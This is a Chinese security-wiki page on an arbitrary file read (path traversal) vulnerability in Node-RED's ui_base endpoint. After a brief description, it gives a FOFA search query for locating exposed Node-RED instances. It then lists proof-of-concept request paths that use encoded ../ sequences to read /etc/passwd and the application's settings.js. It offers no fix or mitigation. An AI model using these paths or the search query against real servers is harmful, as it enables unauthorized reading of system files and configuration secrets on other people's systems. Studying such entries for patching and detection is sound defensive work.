menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Node-RED chevron_right Node-RED ui_base 任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Node-RED ui_base 任意文件读取漏洞.md
    1.35 KB / 2021-07-04 06:01:08
        # Node-RED ui_base 任意文件读取漏洞
    
    ## 漏洞描述
    
    Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join,
    
    缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > Node-RED
    
    ## FOFA
    
    > [!NOTE]
    >
    > title="Node-RED"
    
    ## 漏洞复现
    
    访问页面
    
    ![image-20210701185722667](http://wikioss.peiqi.tech/vuln/image-20210701185722667.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    验证POC
    
    ```
    /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
    /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
    ```
    
    ![image-20210701185812622](http://wikioss.peiqi.tech/vuln/image-20210701185812622.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    ![image-20210704171045540](http://wikioss.peiqi.tech/vuln/image-20210704171045540.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    links
    file_download